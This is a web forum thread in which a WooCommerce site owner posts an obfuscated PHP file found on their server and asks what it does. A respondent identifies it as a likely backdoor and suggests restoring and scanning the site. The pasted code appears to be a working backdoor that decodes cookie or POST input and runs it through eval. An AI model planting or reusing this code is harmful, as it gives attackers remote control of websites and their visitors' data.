By Rashid Rcp


2019-02-11 05:47:22 8 Comments

My woo-commerce site contain a some unknowing PHP file, that i cant find out its purpose.

Here is the sample of the code ,

<?php
$qyxrjyu = 'vxoa_6p*5ci#0l1e4nH7mdsk-rg2t3u9by\'';$dtwaxz = Array();$dtwaxz[] = $qyxrjyu[18].$qyxrjyu[7];$dtwaxz[] = $qyxrjyu[11];$dtwaxz[] = $qyxrjyu[21].$qyxrjyu[14].$qyxrjyu[29].$qyxrjyu[27].$qyxrjyu[19].$qyxrjyu[21].$qyxrjyu[5].$qyxrjyu[12].$qyxrjyu[24].$qyxrjyu[31].$qyxrjyu[3].$qyxrjyu[27].$qyxrjyu[16].$qyxrjyu[24].$qyxrjyu[16].$qyxrjyu[12].$qyxrjyu[8].$qyxrjyu[15].$qyxrjyu[24].$qyxrjyu[32].$qyxrjyu[16].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[24].$qyxrjyu[15].$qyxrjyu[14].$qyxrjyu[31].$qyxrjyu[8].$qyxrjyu[8].$qyxrjyu[9].$qyxrjyu[16].$qyxrjyu[31].$qyxrjyu[29].$qyxrjyu[8].$qyxrjyu[29].$qyxrjyu[19];$dtwaxz[] = $qyxrjyu[9].$qyxrjyu[2].$qyxrjyu[30].$qyxrjyu[17].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[4].$qyxrjyu[25].$qyxrjyu[15].$qyxrjyu[6].$qyxrjyu[15].$qyxrjyu[3].$qyxrjyu[28];$dtwaxz[] = $qyxrjyu[15].$qyxrjyu[1].$qyxrjyu[6].$qyxrjyu[13].$qyxrjyu[2].$qyxrjyu[21].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[30].$qyxrjyu[32].$qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25];$dtwaxz[] = $qyxrjyu[3].$qyxrjyu[25].$qyxrjyu[25].$qyxrjyu[3].$qyxrjyu[33].$qyxrjyu[4].$qyxrjyu[20].$qyxrjyu[15].$qyxrjyu[25].$qyxrjyu[26].$qyxrjyu[15];$dtwaxz[] = $qyxrjyu[22].$qyxrjyu[28].$qyxrjyu[25].$qyxrjyu[13].$qyxrjyu[15].$qyxrjyu[17];$dtwaxz[] = $qyxrjyu[6].$qyxrjyu[3].$qyxrjyu[9].$qyxrjyu[23];foreach ($dtwaxz[7]($_COOKIE, $_POST) as $gitjw => $lsobabb){function mmkwylm($dtwaxz, $gitjw, $wkzdbr){return $dtwaxz[6]($dtwaxz[4]($gitjw . $dtwaxz[2], ($wkzdbr / $dtwaxz[8]($gitjw)) + 1), 0, $wkzdbr);}function irbcfeg($dtwaxz, $bgmei){return @$dtwaxz[9]($dtwaxz[0], $bgmei);}function obdaxad($dtwaxz, $bgmei){$pswrfp = $dtwaxz[3]($bgmei) % 3;if (!$pswrfp) {eval($bgmei[1]($bgmei[2]));exit();}}$lsobabb = irbcfeg($dtwaxz, $lsobabb);obdaxad($dtwaxz, $dtwaxz[5]($dtwaxz[1], $lsobabb ^ mmkwylm($dtwaxz, $gitjw, $dtwaxz[8]($lsobabb))));}

Could any one explain me whats the purpose of these code?

Thanks.

1 comments

@Krzysiek Dróżdż 2019-02-11 06:06:56

It’s definitely not a file from WordPress.

It’s a file with obfuscated code, so it’s hard to read and say what it does exactly.

Most probably it’s a backdoor or some other malicious file lest on your server by attacker/malware infection.

@Rashid Rcp 2019-02-11 07:57:19

I Think so, my site also facing redirecting to a Spam site issue.

@Krzysiek Dróżdż 2019-02-11 07:59:50

@RashidRcp so yeah - it’s infected. Now you have to clean it and secure it properly - otherwise it will get infected again.

@Rashid Rcp 2019-02-11 08:07:12

Could you suggest any options to solve this issue?

@Krzysiek Dróżdż 2019-02-11 08:16:27

@RashidRcp for cleaning? Yeah - restore original files of WP, plugins and themes. Then scan all the DB and other files and search for any malicious scripts. And when you’re certain that the site is clean, then configure it properly.

@Rashid Rcp 2019-02-11 08:44:06

Thanks for your time

Related Questions

Sponsored Content

0 Answered Questions

How to change the displayed image src not the upload path in WordPress

  • 2019-01-22 11:06:29
  • user159572
  • 34 View
  • 0 Score
  • 0 Answer
  • Tags:   woocommerce

1 Answered Questions

0 Answered Questions

woocommerce wc_get_product is not fetching all the product of particular category

0 Answered Questions

woocommerce-order-free-sample-single-product-page / HELP! Samples showing everywhere :(

  • 2018-06-28 13:51:42
  • user146019
  • 381 View
  • 0 Score
  • 0 Answer
  • Tags:   woocommerce

3 Answered Questions

[SOLVED] WP Woocommerce - Disable Add to Cart button when product is Out Of Stock

  • 2017-10-03 12:49:18
  • Vky Arain
  • 6314 View
  • 0 Score
  • 3 Answer
  • Tags:   php woocommerce

2 Answered Questions

[SOLVED] how i can add more required * fields in checkout page?

  • 2017-03-02 06:01:32
  • adel
  • 857 View
  • 1 Score
  • 2 Answer
  • Tags:   woocommerce

0 Answered Questions

Insert variations via woocommerce api

  • 2016-01-26 07:17:11
  • DHRUV GUPTA
  • 1369 View
  • 4 Score
  • 0 Answer
  • Tags:   woocommerce wp-api

Sponsored Content